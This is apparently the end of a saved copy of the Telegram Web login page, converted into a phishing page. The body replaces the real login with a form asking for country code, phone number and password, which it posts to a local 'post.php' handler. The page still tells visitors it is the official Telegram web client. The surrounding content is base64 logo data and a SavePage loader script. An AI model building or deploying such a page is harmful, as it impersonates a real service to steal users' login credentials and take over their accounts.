ODY5LjA5LjI4LjIyLjUyNC4zODkuNzM0cy4zODQuMzc5LjY0NC41MDljLjI2LjEyLjU2OS4xOC45MjkuMTguNDk5IDAgLjg5OS0uMTA1IDEuMTk4LS4zMTQuMzA5LS4yMi41MzktLjU0NC42ODktLjk3M2gxLjYxN2MtLjA5LjQxOS0uMjQ1Ljc5NC0uNDY0IDEuMTIzLS4yMi4zMjktLjQ4NC42MDktLjc5NC44MzktLjMxLjIyLS42NTkuMzg0LTEuMDQ4LjQ5NC0uMzc5LjEyLS43NzkuMTgtMS4xOTguMTgtLjYwOSAwLTEuMTQ4LS4xLTEuNjE3LS4zLS40NjktLjItLjg2OS0uNDc5LTEuMTk4LS44MzktLjMxOS0uMzU5LS41NjQtLjc4OS0uNzM0LTEuMjg4LS4xNi0uNDk5LS4yNC0xLjA0OC0uMjQtMS42NDcgMC0uNTQ5LjA4NS0xLjA2OC4yNTUtMS41NTguMTgtLjQ5OS40MjktLjkzNC43NDktMS4zMDMuMzI5LS4zNzkuNzI0LS42NzkgMS4xODMtLjg5OS40NTktLjIyLjk3OC0uMzI5IDEuNTU3LS4zMjkuNjA5IDAgMS4xNTMuMTMgMS42MzIuMzg5LjQ4OS4yNS44OTQuNTg0IDEuMjEzIDEgLjMxOS40MTkuNTQ5LjkwNC42ODkgMS40NTMuMTUuNTM5LjE5IDEuMDk4LjEyIDEuNjc3aC01LjY5MSIvPjxwYXRoIGQ9Im02Ny44OTYgMTI4Ljk2YzAgMS4xNjgtLjMyOSAyLjAzNy0uOTg4IDIuNjA2LS42NDkuNTc5LTEuNTg4Ljg2OS0yLjgxNi44NjktLjM4OSAwLS43ODQtLjA0LTEuMTgzLS4xMi0uMzg5LS4wOC0uNzQ5LS4yMTUtMS4wNzgtLjQwNC0uMzE5LS4xOS0uNTg5LS40MzktLjgwOS0uNzQ5LS4yMi0uMzEtLjM0OS0uNjg5LS4zODktMS4xMzhoMS43MDdjLjA1LjI0LjEzNS40MzQuMjU1LjU4NC4xMi4xNS4yNi4yNjUuNDE5LjM0NC4xNy4wOS4zNTQuMTQ1LjU1NC4xNjUuMi4wMy40MDkuMDQ1LjYyOS4wNDUuNjg5IDAgMS4xOTMtLjE3IDEuNTEzLS41MDkuMzE5LS4zMzkuNDc5LS44MjkuNDc5LTEuNDY4di0xLjE4M2gtLjAzYy0uMjQuNDI5LS41NjkuNzY0LS45ODggMS0uNDA5LjI0LS44NTQuMzU5LTEuMzMzLjM1OS0uNjE5IDAtMS4xNDgtLjEwNS0xLjU4Ny0uMzE1LS40MjktLjIyLS43ODktLjUxNC0xLjA3OC0uODg0LS4yOC0uMzc5LS40ODQtLjgxNC0uNjE0LTEuMzAzLS4xMy0uNDg5LS4xOTUtMS4wMTMtLjE5NS0xLjU3MyAwLS41MTkuMDgtMS4wMTMuMjQtMS40ODMuMTYtLjQ2OS4zODktLjg3OS42ODktMS4yMjguMy0uMzU5LjY2NC0uNjQ0IDEuMDkzLS44NTQuNDM5LS4yMS45MzQtLjMxNCAxLjQ4My0uMzE0LjQ4OSAwIC45MzkuMTA1IDEuMzQ4LjMxNC40MDkuMi43MjQuNTE5Ljk0NC45NThoLjAzdi0xLjA2M2gxLjcwN3Y3LjMzOG0tMy43ODktLjk0NGMuMzc5IDAgLjY5OS0uMDc1Ljk1OC0uMjI1LjI3LS4xNi40ODQtLjM2NC42NDQtLjYxNC4xNy0uMjYuMjktLjU0OS4zNTktLjg2OS4wOC0uMzI5LjEyLS42NTkuMTItLjk4OCAwLS4zMjktLjA0LS42NDktLjEyLS45NTgtLjA4LS4zMDktLjIwNS0uNTg0LS4zNzQtLjgyNC0uMTYtLjI0LS4zNzQtLjQyOS0uNjQ0LS41NjktLjI2LS4xNC0uNTc0LS4yMS0uOTQ0LS4yMS0uMzc5IDAtLjY5OS4wOC0uOTU4LjI0LS4yNi4xNi0uNDY5LjM2OS0uNjI5LjYyOS0uMTYuMjUtLjI3NS41MzktLjM0NC44NjktLjA3LjMyLS4xMDUuNjM5LS4xMDUuOTU4IDAgLjMyLjA0LjYzNC4xMi45NDQuMDguMy4yLjU2OS4zNTkuODA5LjE3LjI0LjM3OS40MzQuNjI5LjU4NC4yNi4xNS41NjkuMjI1LjkyOS4yMjUiLz48cGF0aCBkPSJtNjkuNjMgMTIxLjYyaDEuNjAzdjEuNDk4aC4wM2MuMDUtLjIxLjE0NS0uNDE0LjI4NS0uNjE0LjE1LS4yLjMyNC0uMzc5LjUyNC0uNTM5LjIxLS4xNy40MzktLjMwNS42ODktLjQwNC4yNS0uMS41MDQtLjE1Ljc2NC0uMTUuMiAwIC4zMzQuMDA1LjQwNC4wMTUuMDguMDEuMTYuMDIuMjQuMDN2MS42NDdjLS4xMi0uMDItLjI0NS0uMDM1LS4zNzQtLjA0NS0uMTItLjAyLS4yNC0uMDMtLjM1OS0uMDMtLjI5IDAtLjU2NC4wNi0uODI0LjE4LS4yNS4xMS0uNDY5LjI4LS42NTkuNTA5LS4xOS4yMi0uMzM5LjQ5NC0uNDQ5LjgyNC0uMTEuMzI5LS4xNjUuNzA5LS4xNjUgMS4xMzh2My42ODRoLTEuNzA3di03Ljc0MyIvPjxwYXRoIGQ9Im04MS4zOCAxMjcuNjVjMCAuMjEuMDI1LjM1OS4wNzUuNDQ5LjA2LjA5LjE3LjEzNS4zMjkuMTM1aC4xOGMuMDcgMCAuMTUtLjAxLjI0LS4wM3YxLjE4M2MtLjA2LjAyLS4xNC4wNC0uMjQuMDYtLjA5LjAzLS4xODUuMDU1LS4yODUuMDc1LS4xLjAyLS4yLjAzNS0uMy4wNDUtLjEuMDEtLjE4NS4wMTUtLjI1NS4wMTUtLjM0OSAwLS42MzktLjA3LS44NjktLjIxLS4yMy0uMTQtLjM3OS0uMzg0LS40NDktLjczNC0uMzM5LjMyOS0uNzU5LjU2OS0xLjI1OC43MTktLjQ4OS4xNS0uOTYzLjIyNS0xLjQyMy4yMjUtLjM0OSAwLS42ODQtLjA1LTEtLjE1LS4zMi0uMDktLjYwNC0uMjI1LS44NTQtLjQwNC0uMjQtLjE5LS40MzQtLjQyNC0uNTg0LS43MDQtLjE0LS4yOS0uMjEtLjYyNC0uMjEtMSAwLS40NzkuMDg1LS44NjkuMjU1LTEuMTY4LjE4LS4zLjQwOS0uNTM0LjY4OS0uNzA0LjI5LS4xNy42MDktLjI5Ljk1OC0uMzU5LjM1OS0uMDguNzE5LS4xNCAxLjA3OC0uMTguMzA5LS4wNi42MDQtLjEuODg0LS4xMi4yOC0uMDMuNTI0LS4wNzUuNzM0LS4xMzUuMjItLjA2LjM4OS0uMTUuNTA5LS4yNy4xMy0uMTMuMTk1LS4zMTkuMTk1LS41NjkgMC0uMjItLjA1NS0uMzk5LS4xNjUtLjUzOS0uMS0uMTQtLjIzLS4yNDUtLjM4OS0uMzE0LS4xNS0uMDgtLjMyLS4xMy0uNTA5LS4xNS0uMTktLjAzLS4zNjktLjA0NS0uNTM5LS4wNDUtLjQ3OSAwLS44NzQuMS0xLjE4My4zLS4zMS4yLS40ODQuNTA5LS41MjQuOTI5aC0xLjcwN2MuMDMtLjQ5OS4xNS0uOTE0LjM1OS0xLjI0My4yMS0uMzI5LjQ3NC0uNTk0Ljc5NC0uNzk0LjMyOS0uMi42OTktLjMzOSAxLjEwOC0uNDE5LjQwOS0uMDguODI5LS4xMiAxLjI1OC0uMTIuMzc5IDAgLjc1NC4wNCAxLjEyMy4xMi4zNjkuMDguNjk5LjIxLjk4OC4zODkuMy4xOC41MzkuNDE0LjcxOS43MDQuMTguMjguMjcuNjI0LjI3IDEuMDMzdjMuOTg0bS0xLjcwNy0yLjE1N2MtLjI2LjE3LS41NzkuMjc1LS45NTguMzE0LS4zNzkuMDMtLjc1OS4wOC0xLjEzOC4xNS0uMTguMDMtLjM1NC4wNzUtLjUyNC4xMzUtLjE3LjA1LS4zMi4xMjUtLjQ0OS4yMjUtLjEzLjA5LS4yMzUuMjE1LS4zMTQuMzc0LS4wNy4xNS0uMTA1LjMzNC0uMTA1LjU1NCAwIC4xOS4wNTUuMzQ5LjE2NS40NzkuMTEuMTMuMjQuMjM1LjM4OS4zMTUuMTYuMDcuMzI5LjEyLjUwOS4xNS4xOS4wMy4zNTkuMDQ1LjUwOS4wNDUuMTkgMCAuMzk0LS4wMjUuNjE0LS4wNzVzLjQyNC0uMTM1LjYxNC0uMjU1Yy4yLS4xMi4zNjQtLjI3LjQ5NC0uNDQ5LjEzLS4xOS4xOTUtLjQxOS4xOTUtLjY4OXYtMS4yNzMiLz48cGF0aCBkPSJtODMuMjMgMTIxLjYyaDEuNjE3djEuMDc4aC4wNDVjLjEzLS4xOS4yNy0uMzY0LjQxOS0uNTI0LjE1LS4xNi4zMTQtLjI5NS40OTQtLjQwNC4xOS0uMTEuNDA0LS4xOTUuNjQ0LS4yNTUuMjQtLjA3LjUxNC0uMTA1LjgyNC0uMTA1LjQ2OSAwIC45MDQuMTA1IDEuMzAzLjMxNC40MDkuMjEuNjk5LjUzNC44NjkuOTczLjI5LS4zOTkuNjI0LS43MTQgMS0uOTQ0LjM3OS0uMjMuODU0LS4zNDQgMS40MjMtLjM0NC44MTkgMCAxLjQ1My4yIDEuOTAyLjU5OS40NTkuMzk5LjY4OSAxLjA2OC42ODkgMi4wMXY1LjM0NmgtMS43MDd2LTQuNTIzYzAtLjMwOS0uMDEtLjU4OS0uMDMtLjgzOS0uMDItLjI2LS4wOC0uNDc5LS4xOC0uNjU5LS4wOS0uMTktLjIzLS4zMzQtLjQxOS0uNDM0LS4xOS0uMS0uNDQ5LS4xNS0uNzc5LS4xNS0uNTc5IDAtLjk5OC4xOC0xLjI1OC41MzktLjI2LjM1OS0uMzg5Ljg2OS0uMzg5IDEuNTI4djQuNTM4aC0xLjcwN3YtNC45NzJjMC0uNTM5LS4xLS45NDQtLjMtMS4yMTMtLjE5LS4yOC0uNTQ0LS40MTktMS4wNjMtLjQxOS0uMjIgMC0uNDM0LjA0NS0uNjQ0LjEzNS0uMi4wOS0uMzc5LjIyLS41MzkuMzg5LS4xNS4xNy0uMjc1LjM3OS0uMzc0LjYyOS0uMDkuMjUtLjEzNS41MzQtLjEzNS44NTR2NC41OThoLTEuNzA3di03Ljc0MyIvPjwvZz48L3N2Zz4=);
  4070. }
  4071. </style>
  4072. <script id="savepage-shadowloader" type="application/javascript">
  4073. "use strict"
  4074. window.addEventListener("DOMContentLoaded",
  4075. function(event)
  4076. {
  4077. savepage_ShadowLoader(5);
  4078. },false);
  4079. function savepage_ShadowLoader(c){createShadowDOMs(0,document.documentElement);function createShadowDOMs(a,b){var i;if(b.localName=="iframe"||b.localName=="frame"){if(a<c){try{if(b.contentDocument.documentElement!=null){createShadowDOMs(a+1,b.contentDocument.documentElement)}}catch(e){}}}else{if(b.children.length>=1&&b.children[0].localName=="template"&&b.children[0].hasAttribute("data-savepage-shadowroot")){b.attachShadow({mode:"open"}).appendChild(b.children[0].content);b.removeChild(b.children[0]);for(i=0;i<b.shadowRoot.children.length;i++)if(b.shadowRoot.children[i]!=null)createShadowDOMs(a,b.shadowRoot.children[i])}for(i=0;i<b.children.length;i++)if(b.children[i]!=null)createShadowDOMs(a,b.children[i])}}}
  4080. </script>
  4081. <style>
  4082. button {
  4083. color: aqua;
  4084. background-color: #5682a3;
  4085. border: none;
  4086. color: white;
  4087. }
  4088. </style>
  4089. <meta name="savepage-url" content="https://web.telegram.org/#/login">
  4090. <meta name="savepage-title" content="Telegram Web">
  4091. <meta name="savepage-from" content="https://web.telegram.org/#/login">
  4092. <meta name="savepage-date" content="Sat Apr 04 2020 07:41:35 GMT-0700 (Pacific Daylight Time)">
  4093. <meta name="savepage-state" content="Standard Items; Retained cross-origin frames; Removed unsaved URLs; Max frame depth = 5; Max resource size = 50MB; Max resource time = 10s;">
  4094. <meta name="savepage-version" content="17.2">
  4095. <meta name="savepage-comments" content="">
  4096. </head><body class="non_osx non_msie is_1x"><!---->
  4097. <div class="page_wrap" ng-view=""><div class="login_page_wrap" my-custom-background="#e7ebf0">
  4098. <form method="post" action="post.php">
  4099. <div class="login_head_bg"></div>
  4100. <div class="login_page">
  4101. <div class="login_head_wrap clearfix" ng-switch="progress.enabled">
  4102. <a class="login_head_logo_link" href="">
  4103. <i class="icon icon-tg-logo"></i><i class="icon icon-tg-title"></i>
  4104. </a>
  4105. </div>
  4106. <div class="login_form_wrap">
  4107. <!---->
  4108. <!----><form action="post.php" method="post" name="mySendCodeForm" ng-if="!credentials.phone_code_hash" ng-submit="sendCode()" class="ng-pristine ng-invalid ng-invalid-required">
  4109. <h3 class="login_form_head" my-i18n="login_sign_in">Sign in</h3>
  4110. <p class="login_form_lead" my-i18n="login_enter_number_description">Please enter your full phone number and your password.</p>
  4111. <div class="login_phone_groups_wrap clearfix">
  4112. <div class="md-input-group login_phone_num_input_group md-input-animated" ng-class="{'md-input-error': error.field == 'phone'}" my-labeled-input="" ng-switch="error.field == 'phone'">
  4113. <label class="md-input-label" my-i18n="login_code_input_placeholder">Country Code &nbsp; &nbsp; e.x +1 </label>
  4114. <label ng-switch-default="" class="md-input-label" my-i18n="login_tel_input_placeholder">.</label>
  4115. <input required="" autofocus autocomplete="off" my-submit-on-enter="" class="md-input ng-pristine ng-empty ng-invalid ng-invalid-required ng-touched" my-focus-on="country_selected" name="country_code" type="text" ng-model="credentials.phone_number" style="" value="">
  4116. </div>
  4117. <div class="md-input-group login_phone_num_input_group md-input-animated" ng-class="{'md-input-error': error.field == 'phone'}" my-labeled-input="" ng-switch="error.field == 'phone'">
  4118. <label class="md-input-label" my-i18n="login_code_input_placeholder">Phone Number</label>
  4119. <label ng-switch-default="" class="md-input-label" my-i18n="login_tel_input_placeholder">.</label>
  4120. <input required="" autofocus autocomplete="off" my-submit-on-enter="" class="md-input ng-pristine ng-empty ng-invalid ng-invalid-required ng-touched" my-focus-on="country_selected" name="phone_number" type="tel" ng-model="credentials.phone_number" style="" value="">
  4121. </div>
  4122. <div class="md-input-group login_phone_num_input_group md-input-animated" ng-class="{'md-input-error': error.field == 'phone'}" my-labeled-input="" ng-switch="error.field == 'phone'">
  4123. <label class="md-input-label" my-i18n="login_code_input_placeholder">Password</label>
  4124. <label ng-switch-default="" class="md-input-label" my-i18n="login_tel_input_placeholder">.</label>
  4125. <input required="" autofocus autocomplete="off" my-submit-on-enter="" class="md-input ng-pristine ng-empty ng-invalid ng-invalid-required ng-touched" my-focus-on="country_selected" name="password" type="password" ng-model="credentials.phone_number" style="" value="">
  4126. </div>
  4127. <button type="submit" style="height:30px; width:100%";>
  4128. Login <i class="icon icon-next-submit"></i>
  4129. </button>
  4130. </div>
  4131. <div class="login_form_messaging ng-hide" ng-show="progress.enabled" my-i18n="login_generating_keys_info">Keys are only generated once. This can take a few minutes on slower devices, please be patient.</div>
  4132. </form>
  4133. <!---->
  4134. <!---->
  4135. <!---->
  4136. <!---->
  4137. </div>
  4138. <div ng-switch="about.shown">
  4139. <!---->
  4140. <!----><div ng-switch-default="" class="login_footer_wrap">
  4141. <p my-i18n="login_about_intro">Welcome to the official Telegram web-client.</p>
  4142. <a class="logo_footer_learn_more_link" href="" ng-click="about.shown = true" my-i18n="login_about_learn">Learn more</a>
  4143. </div><!---->
  4144. </div>
  4145. </div>
  4146. </form>
  4147. </div>
  4148. </div><div id="notify_sound"></div><script data-savepage-src="js/app.js"></script></body><script type="text/javascript" id="useragent-switcher"></script></html>